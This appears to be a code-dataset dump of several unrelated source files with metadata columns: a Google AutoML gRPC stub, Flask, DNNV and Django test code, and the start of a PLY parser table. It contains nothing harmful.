'/google.cloud.automl.v1beta1.AutoMl/GetDataset',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetDatasetRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.FromString,
)
self.ListDatasets = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/ListDatasets',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsResponse.FromString,
)
self.DeleteDataset = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/DeleteDataset',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteDatasetRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ImportData = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/ImportData',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ImportDataRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ExportData = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/ExportData',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ExportDataRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.CreateModel = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/CreateModel',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetModel = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/GetModel',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__pb2.Model.FromString,
)
self.ListModels = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/ListModels',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsResponse.FromString,
)
self.DeleteModel = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/DeleteModel',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.DeployModel = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/DeployModel',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeployModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.UndeployModel = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/UndeployModel',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.UndeployModelRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetModelEvaluation = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/GetModelEvaluation',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelEvaluationRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__evaluation__pb2.ModelEvaluation.FromString,
)
self.ListModelEvaluations = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/ListModelEvaluations',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsResponse.FromString,
)
class AutoMlServicer(object):
"""AutoML Server API.
The resource names are assigned by the server.
The server never reuses names that it has created after the resources with
those names are deleted.
An ID of a resource is the last element of the item's resource name. For
`projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
the id for the item is `{dataset_id}`.
"""
def CreateDataset(self, request, context):
"""Creates a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDataset(self, request, context):
"""Gets a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListDatasets(self, request, context):
"""Lists datasets in a project.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteDataset(self, request, context):
"""Deletes a dataset and all of its contents.
Returns empty response in the
[response][google.longrunning.Operation.response] field when it completes,
and `delete_details` in the
[metadata][google.longrunning.Operation.metadata] field.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ImportData(self, request, context):
"""Imports data into a dataset.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ExportData(self, request, context):
"""Exports dataset's data to a Google Cloud Storage bucket.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateModel(self, request, context):
"""Creates a model.
Returns a Model in the [response][google.longrunning.Operation.response]
field when it completes.
When you create a model, several model evaluations are created for it:
a global evaluation, and one evaluation for each annotation spec.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModel(self, request, context):
"""Gets a model.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModels(self, request, context):
"""Lists models.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModel(self, request, context):
"""Deletes a model.
If a model is already deployed, this only deletes the model in AutoML BE,
and does not change the status of the deployed model in the production
environment.
Returns `google.protobuf.Empty` in the
[response][google.longrunning.Operation.response] field when it completes,
and `delete_details` in the
[metadata][google.longrunning.Operation.metadata] field.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeployModel(self, request, context):
"""Deploys model.
Returns a [DeployModelResponse][] in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UndeployModel(self, request, context):
"""Undeploys model.
Returns an `UndeployModelResponse` in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelEvaluation(self, request, context):
"""Gets a model evaluation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModelEvaluations(self, request, context):
"""Lists model evaluations.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AutoMlServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateDataset': grpc.unary_unary_rpc_method_handler(
servicer.CreateDataset,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateDatasetRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.SerializeToString,
),
'GetDataset': grpc.unary_unary_rpc_method_handler(
servicer.GetDataset,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetDatasetRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.SerializeToString,
),
'ListDatasets': grpc.unary_unary_rpc_method_handler(
servicer.ListDatasets,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsResponse.SerializeToString,
),
'DeleteDataset': grpc.unary_unary_rpc_method_handler(
servicer.DeleteDataset,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteDatasetRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'ImportData': grpc.unary_unary_rpc_method_handler(
servicer.ImportData,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ImportDataRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'ExportData': grpc.unary_unary_rpc_method_handler(
servicer.ExportData,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ExportDataRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'CreateModel': grpc.unary_unary_rpc_method_handler(
servicer.CreateModel,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'GetModel': grpc.unary_unary_rpc_method_handler(
servicer.GetModel,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__pb2.Model.SerializeToString,
),
'ListModels': grpc.unary_unary_rpc_method_handler(
servicer.ListModels,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsResponse.SerializeToString,
),
'DeleteModel': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModel,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'DeployModel': grpc.unary_unary_rpc_method_handler(
servicer.DeployModel,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeployModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'UndeployModel': grpc.unary_unary_rpc_method_handler(
servicer.UndeployModel,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.UndeployModelRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'GetModelEvaluation': grpc.unary_unary_rpc_method_handler(
servicer.GetModelEvaluation,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelEvaluationRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__evaluation__pb2.ModelEvaluation.SerializeToString,
),
'ListModelEvaluations': grpc.unary_unary_rpc_method_handler(
servicer.ListModelEvaluations,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.cloud.automl.v1beta1.AutoMl', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 52.367412 | 143 | 0.78842 | 1,873 | 16,391 | 6.450614 | 0.093967 | 0.069939 | 0.053302 | 0.064724 | 0.830988 | 0.818159 | 0.810545 | 0.763284 | 0.705595 | 0.698312 | 0 | 0.013924 | 0.141236 | 16,391 | 312 | 144 | 52.535256 | 0.844416 | 0.148252 | 0 | 0.350711 | 1 | 0 | 0.111071 | 0.051668 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075829 | false | 0 | 0.061611 | 0 | 0.146919 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
76b77e633f5d78d6420a664009b82fb6e6631013 | 107 | py | Python | app/blueprints/admin_ext/__init__.py | lvyaoo/api-demo | f45c05c154385510572b5200b74dcbbfdb7e234c | [
"MIT"
] | null | null | null | app/blueprints/admin_ext/__init__.py | lvyaoo/api-demo | f45c05c154385510572b5200b74dcbbfdb7e234c | [
"MIT"
] | null | null | null | app/blueprints/admin_ext/__init__.py | lvyaoo/api-demo | f45c05c154385510572b5200b74dcbbfdb7e234c | [
"MIT"
] | null | null | null | from flask import Blueprint
bp_admin_ext = Blueprint('bp_admin_ext', __name__)
from . import extensions
| 15.285714 | 50 | 0.794393 | 15 | 107 | 5.133333 | 0.6 | 0.285714 | 0.415584 | 0.493506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140187 | 107 | 6 | 51 | 17.833333 | 0.836957 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
4f5cc8ab0c76e3412fe0f56da6528917303d2042 | 4,534 | py | Python | tests/unit_tests/test_properties/test_visitors/test_DetailsInference/test_IfThenElse.py | samysweb/dnnv | 58fb95b7300914d9da28eed86c39eca473b1aaef | [
"MIT"
] | 5 | 2022-01-28T20:30:34.000Z | 2022-03-17T09:26:52.000Z | tests/unit_tests/test_properties/test_visitors/test_DetailsInference/test_IfThenElse.py | samysweb/dnnv | 58fb95b7300914d9da28eed86c39eca473b1aaef | [
"MIT"
] | 9 | 2022-01-27T03:50:28.000Z | 2022-02-08T18:42:17.000Z | tests/unit_tests/test_properties/test_visitors/test_DetailsInference/test_IfThenElse.py | samysweb/dnnv | 58fb95b7300914d9da28eed86c39eca473b1aaef | [
"MIT"
] | 2 | 2022-02-03T17:32:43.000Z | 2022-03-24T16:38:49.000Z | import numpy as np
import pytest
from dnnv.properties.expressions import *
from dnnv.properties.visitors import DetailsInference, DNNVShapeError, DNNVTypeError
def test_IfThenElse_symbols():
inference = DetailsInference()
c, t, f = Symbol("c"), Symbol("t"), Symbol("f")
expr = IfThenElse(c, t, f)
inference.visit(expr)
assert inference.shapes[c].is_concrete
assert not inference.shapes[t].is_concrete
assert not inference.shapes[f].is_concrete
assert not inference.shapes[expr].is_concrete
assert inference.types[c].is_concrete
assert not inference.types[t].is_concrete
assert not inference.types[f].is_concrete
assert not inference.types[expr].is_concrete
assert inference.shapes[c].value == ()
assert inference.types[c].value == bool
def test_IfThenElse_constant_cond():
inference = DetailsInference()
c, t, f = Constant(False), Symbol("t"), Symbol("f")
expr = IfThenElse(c, t, f)
inference.visit(expr)
assert inference.shapes[c].is_concrete
assert not inference.shapes[t].is_concrete
assert not inference.shapes[f].is_concrete
assert not inference.shapes[expr].is_concrete
assert inference.types[c].is_concrete
assert not inference.types[t].is_concrete
assert not inference.types[f].is_concrete
assert not inference.types[expr].is_concrete
assert inference.shapes[c].value == ()
assert inference.types[c].value == bool
def test_IfThenElse_constant_true_expr():
inference = DetailsInference()
c, t, f = Symbol("c"), Constant(np.array((1, 2))), Symbol("f")
expr = IfThenElse(c, t, f)
inference.visit(expr)
assert inference.shapes[c].is_concrete
assert inference.shapes[t].is_concrete
assert inference.shapes[f].is_concrete
assert inference.shapes[expr].is_concrete
assert inference.types[c].is_concrete
assert inference.types[t].is_concrete
assert inference.types[f].is_concrete
assert inference.types[expr].is_concrete
assert inference.shapes[c].value == ()
assert inference.types[c].value == bool
assert inference.shapes[t].value == t.value.shape
assert inference.types[t].value == t.value.dtype
assert inference.shapes[f].value == t.value.shape
assert inference.types[f].value == t.value.dtype
assert inference.shapes[expr].value == t.value.shape
assert inference.types[expr].value == t.value.dtype
def test_IfThenElse_constant_false_expr():
inference = DetailsInference()
c, t, f = Symbol("c"), Symbol("t"), Constant(np.array((1, 2)))
expr = IfThenElse(c, t, f)
inference.visit(expr)
assert inference.shapes[c].is_concrete
assert inference.shapes[t].is_concrete
assert inference.shapes[f].is_concrete
assert inference.shapes[expr].is_concrete
assert inference.types[c].is_concrete
assert inference.types[t].is_concrete
assert inference.types[f].is_concrete
assert inference.types[expr].is_concrete
assert inference.shapes[c].value == ()
assert inference.types[c].value == bool
assert inference.shapes[t].value == f.value.shape
assert inference.types[t].value == f.value.dtype
assert inference.shapes[f].value == f.value.shape
assert inference.types[f].value == f.value.dtype
assert inference.shapes[expr].value == f.value.shape
assert inference.types[expr].value == f.value.dtype
def test_IfThenElse_incompatible_shapes():
inference = DetailsInference()
with get_context():
c, t, f = (
Symbol("c"),
Constant(np.random.rand(3, 5)),
Constant(np.random.rand(1, 2)),
)
expr = IfThenElse(c, t, f)
with pytest.raises(DNNVShapeError):
inference.visit(expr)
with get_context():
c, t, f = Constant(np.random.rand(3, 5) > 0.5), Symbol("true"), Symbol("false")
expr = IfThenElse(c, t, f)
with pytest.raises(DNNVShapeError):
inference.visit(expr)
def test_IfThenElse_incompatible_types():
inference = DetailsInference()
with get_context():
c, t, f = (
Symbol("c"),
Constant(np.random.rand(3, 5)),
Constant(np.random.rand(3, 5) > 0.5),
)
expr = IfThenElse(c, t, f)
with pytest.raises(DNNVTypeError):
inference.visit(expr)
with get_context():
c, t, f = Constant(8), Symbol("true"), Symbol("false")
expr = IfThenElse(c, t, f)
with pytest.raises(DNNVTypeError):
inference.visit(expr)
| 31.929577 | 87 | 0.674019 | 600 | 4,534 | 5.001667 | 0.086667 | 0.199933 | 0.17061 | 0.166611 | 0.916694 | 0.882039 | 0.882039 | 0.74875 | 0.727757 | 0.702099 | 0 | 0.005226 | 0.198059 | 4,534 | 141 | 88 | 32.156028 | 0.820132 | 0 | 0 | 0.703704 | 0 | 0 | 0.006396 | 0 | 0 | 0 | 0 | 0 | 0.481481 | 1 | 0.055556 | false | 0 | 0.037037 | 0 | 0.092593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4f65766abb8ecd0bfcd72618cfcd3ec22559b1bb | 146 | py | Python | tirelire-auth/app/service_layer/unit_of_work/__init__.py | AgRenaud/tirelire | 0ac42dbf735dea4ecb741057bd037c18657b95c7 | [
"MIT"
] | null | null | null | tirelire-auth/app/service_layer/unit_of_work/__init__.py | AgRenaud/tirelire | 0ac42dbf735dea4ecb741057bd037c18657b95c7 | [
"MIT"
] | null | null | null | tirelire-auth/app/service_layer/unit_of_work/__init__.py | AgRenaud/tirelire | 0ac42dbf735dea4ecb741057bd037c18657b95c7 | [
"MIT"
] | null | null | null | from app.service_layer.unit_of_work.unit_of_work import UnitOfWork
from app.service_layer.unit_of_work.sqlalchemy_uow import SQLAlchemyUnitOfWork
| 48.666667 | 78 | 0.90411 | 23 | 146 | 5.347826 | 0.521739 | 0.146341 | 0.243902 | 0.308943 | 0.471545 | 0.471545 | 0.471545 | 0 | 0 | 0 | 0 | 0 | 0.054795 | 146 | 2 | 79 | 73 | 0.891304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8c458a6817a0d481c7a6338570265190b823d0b4 | 25 | py | Python | b.py | usha324/python | 7aa967b8dac8cd0c466652db448cb7e405821389 | [
"bzip2-1.0.6"
] | null | null | null | b.py | usha324/python | 7aa967b8dac8cd0c466652db448cb7e405821389 | [
"bzip2-1.0.6"
] | null | null | null | b.py | usha324/python | 7aa967b8dac8cd0c466652db448cb7e405821389 | [
"bzip2-1.0.6"
] | null | null | null | x=17/2%2*3**3
print(x)
| 8.333333 | 14 | 0.52 | 8 | 25 | 1.625 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0.16 | 25 | 2 | 15 | 12.5 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
8c57c2322c54f644f97d17025e73554430e0a592 | 5,181 | py | Python | tests/app/tests/functional/test_item_endpoints.py | suneel0101/django-easyrest | 62c5a8883d5e7adcea8cd95846881acb31991c85 | [
"MIT"
] | null | null | null | tests/app/tests/functional/test_item_endpoints.py | suneel0101/django-easyrest | 62c5a8883d5e7adcea8cd95846881acb31991c85 | [
"MIT"
] | 3 | 2020-02-11T22:12:09.000Z | 2021-06-10T17:40:29.000Z | tests/app/tests/functional/test_item_endpoints.py | suneel0101/django-easyrest | 62c5a8883d5e7adcea8cd95846881acb31991c85 | [
"MIT"
] | null | null | null | import json
from sure import expect, scenario
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test.client import Client
from easyrest.models import APIKey
from app.models import Item, UserItem
client = Client()
def create_items(context):
# Delete all items
Item.objects.all().delete()
# Create 30 items
for x in range(30):
Item.objects.create(
name="my name is {}".format(x),
text="my text is {}".format(x),
is_active=x % 2,
status=x)
@scenario(create_items)
def test_get_item(context):
response = client.get(reverse('item_item', kwargs={"_id": 1}),
content_type='application/json')
expected_response_content = {
"id": 1,
"text": "my text is 0",
"popularity": 0}
expect(json.loads(response.content)).to.equal(expected_response_content)
expect(response.status_code).to.equal(200)
@scenario(create_items)
def test_get_non_existent_item(context):
response = client.get(reverse('item_item', kwargs={"_id": 99}),
content_type='application/json')
expected_response_content = {"error": "No result matches id: 99"}
expect(json.loads(response.content)).to.equal(expected_response_content)
expect(response.status_code).to.equal(400)
def test_get_item_failed_authorization_without_key():
APIKey.objects.all().delete()
response = client.get(reverse('authorized_item_item', kwargs={"_id": 1}),
content_type='application/json')
expect(response.status_code).to.equal(403)
def test_get_item_failed_authorization_with_wrong_key():
APIKey.objects.all().delete()
response = client.get(reverse('authorized_item_item', kwargs={"_id": 1}),
data={'key': "the-wrong-key"},
content_type='application/json')
expect(response.status_code).to.equal(403)
def test_get_item_authed_successful():
# Delete all items
UserItem.objects.all().delete()
APIKey.objects.all().delete()
User.objects.all().delete()
user = User.objects.create(username='tester', password='123')
user2 = User.objects.create(username='tester2', password='345')
# Create 30 items
for x in range(30):
UserItem.objects.create(
name="my name is {}".format(x),
user=[user, user2][x % 2],
is_active=x % 2)
apikey = APIKey.objects.create(user=user)
response = client.get(reverse('authorized_item_item', kwargs={"_id": 1}),
data={'apikey': apikey.token},
content_type='application/json')
expected_response_content = {
"id": 1,
"user_id": user.id,
"name": "my name is 0"}
expect(json.loads(response.content)).to.equal(expected_response_content)
expect(response.status_code).to.equal(200)
def test_get_item_filter_by_user_with_access():
# Delete all items
UserItem.objects.all().delete()
APIKey.objects.all().delete()
User.objects.all().delete()
user = User.objects.create(username='tester', password='123')
user2 = User.objects.create(username='tester2', password='345')
# Create 30 items
for x in range(30):
UserItem.objects.create(
name="my name is {}".format(x),
user=[user, user2][x % 2],
is_active=x % 2)
apikey = APIKey.objects.create(user=user)
response = client.get(reverse('by_user_authorized_item_item',
kwargs={"_id": 1}),
data={'apikey': apikey.token},
content_type='application/json')
expected_response_content = {
"id": 1,
"user_id": user.id,
"name": "my name is 0"}
expect(json.loads(response.content)).to.equal(expected_response_content)
expect(response.status_code).to.equal(200)
def test_get_item_filter_by_user_without_access():
# Delete all items
UserItem.objects.all().delete()
APIKey.objects.all().delete()
User.objects.all().delete()
user = User.objects.create(username='tester', password='123')
user2 = User.objects.create(username='tester2', password='345')
# Create 30 items
for x in range(30):
UserItem.objects.create(
name="my name is {}".format(x),
user=[user, user2][x % 2],
is_active=x % 2)
apikey = APIKey.objects.create(user=user)
response = client.get(reverse('by_user_authorized_item_item',
kwargs={"_id": 2}),
data={'apikey': apikey.token},
content_type='application/json')
expected_response_content = {
"error": "You do not have access to this data"}
expect(json.loads(response.content)).to.equal(expected_response_content)
expect(response.status_code).to.equal(400)
def test_get_item_with_non_GET_method():
response = client.post(reverse('item_item', kwargs={"_id": 1}),
content_type='application/json')
expect(response.status_code).to.equal(403)
| 34.54 | 77 | 0.626327 | 640 | 5,181 | 4.89375 | 0.148438 | 0.071839 | 0.061303 | 0.040868 | 0.84387 | 0.84387 | 0.813218 | 0.813218 | 0.775862 | 0.767561 | 0 | 0.023297 | 0.237792 | 5,181 | 149 | 78 | 34.771812 | 0.769815 | 0.025285 | 0 | 0.711712 | 0 | 0 | 0.118627 | 0.011109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0.054054 | 0.063063 | 0 | 0.144144 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
8c613a1dc86c3a13ee6eecbe61e6c1cf76c895d0 | 28,150 | py | Python | parsetab.py | Lee-Junhee/graphics | 2fe9c838b8749465547ed2bdb00938eda69275a3 | [
"MIT"
] | null | null | null | parsetab.py | Lee-Junhee/graphics | 2fe9c838b8749465547ed2bdb00938eda69275a3 | [
"MIT"
] | null | null | null | parsetab.py | Lee-Junhee/graphics | 2fe9c838b8749465547ed2bdb00938eda69275a3 | [
"MIT"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'AMBIENT BASENAME BOX CAMERA CO COMMENT CONSTANTS DISPLAY DOUBLE FOCAL FRAMES FXN GENERATE_RAYFILES ID INT LIGHT LINE MESH MOVE POP PUSH ROTATE SAVE SAVE_COORDS SAVE_KNOBS SCALE SCREEN SET SET_KNOBS SHADING SHADING_TYPE SPHERE STRING TEXTURE TORUS TWEEN VARY WEB XYZinput :\n | command inputcommand : COMMENTSYMBOL : XYZ\n | IDTEXT : SYMBOL\n | STRINGNUMBER : DOUBLEcommand : POP\n | PUSHcommand : SCREEN NUMBER NUMBER\n | SCREENcommand : SAVE TEXT TEXTcommand : DISPLAYcommand : SPHERE NUMBER NUMBER NUMBER NUMBER\n | SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER\n | SPHERE NUMBER NUMBER NUMBER NUMBER SYMBOL\n | SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : TORUS NUMBER NUMBER NUMBER NUMBER NUMBER\n | TORUS NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER\n | TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOLcommand : LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER\n | LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOL\n | LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER\n | LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL\n | LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER\n | LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOLcommand : MOVE NUMBER NUMBER NUMBER 